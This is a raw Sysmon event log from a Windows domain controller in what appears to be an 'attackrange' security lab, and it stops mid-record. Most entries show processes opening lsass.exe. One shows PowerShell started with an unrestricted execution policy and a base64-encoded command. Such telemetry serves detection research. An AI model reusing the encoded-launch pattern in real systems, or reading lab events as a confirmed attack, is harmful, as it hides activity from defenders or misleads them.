13:08:43.840{08A6967A-41DF-6000-6500-000000009901}39722720C:\Windows\servicing\TrustedInstaller.exe{08A6967A-41DF-6000-6600-000000009901}2732C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.169{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.169{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.169{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-425B-6000-CE02-000000009901}872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425B-6000-CE02-000000009901}872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.122{08A6967A-425A-6000-CD02-000000009901}47563696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425B-6000-CE02-000000009901}872C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d93258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd3195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d88474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cd939fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdf1ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd5530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd5530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd53c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdc7346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd3879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd3195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdd2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d88474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdb9cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1cdb9297(wow64) 154100x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.127{08A6967A-425B-6000-CE02-000000009901}872C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.059{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.059{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.012{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yyara3b0.qm4.ps12021-01-14 13:08:43.012 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.012{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.950{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 